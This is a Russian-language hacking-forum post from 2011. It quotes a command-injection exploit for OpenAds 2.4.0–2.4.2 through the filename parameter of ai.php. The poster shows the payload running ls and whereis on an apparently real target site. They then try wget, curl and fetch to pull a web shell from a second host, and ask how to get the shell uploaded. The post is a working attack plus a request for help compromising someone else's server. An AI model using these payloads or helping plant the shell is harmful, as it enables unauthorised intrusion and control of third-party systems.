
14.12.2011, 17:05
|
|
Новичок
Регистрация: 01.10.2010
Сообщений: 0
С нами:
8217686
Репутация:
0
|
|
Сообщение от (Dm)
[ + ] Уязвимости Openads 2.4.0 - 2.4.2
>> Выполнение php кода
сплоит:
Цитата:
http://host/www/delivery/ai.php?filename=antichat.jpg';system($_GET[cmd]);/*&contenttype=antichat&cmd=ls -la
Помогите с заливкой шелла. Нашел данную уязвимость.
Код:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=ls -la
выполняется
Код:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=whereis wget
выполняется
Код:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=wget http://site2.ru/shell.txt
не выполняется
пробовал аналогично и fetch, и curl - не хочет заливать.
также пробовал указать адрес site2.ru без http, пробовал закодировать в ascii, в base64 и т.д.
Как залить шелл?
|
|
|